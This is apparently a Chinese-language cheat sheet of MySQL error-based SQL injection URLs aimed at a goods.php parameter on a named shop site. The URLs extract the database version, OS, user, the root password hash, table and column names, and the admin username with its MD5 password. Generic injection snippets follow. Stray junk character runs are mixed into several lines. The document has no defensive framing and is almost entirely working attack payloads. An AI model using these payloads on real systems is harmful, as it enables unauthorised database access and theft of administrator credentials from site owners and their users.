判断版本号
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%231 S# y- }0 i* }4 S* z8 j
当前 user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23) ?7 w N: o* g* y$ X. Y- H
root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23/ K# ^) k; |8 Z! U! M" v; s
当前 数据库表名
. v+ h+ g7 M9 J( F; `' o- j5 Y" Dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
当前 数据库 user_name 字段
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% n* z. ?1 J: [# l* f; ^; ]
当前 数据库 字段 password
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
获得 admin passwd(md5)
/ @$ j1 \: d9 b- D: X. O. ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
报错注射
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)0 ^% i7 N* G% f+ K( S5 g R
; o/ o7 S/ n9 g$ r6 rSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |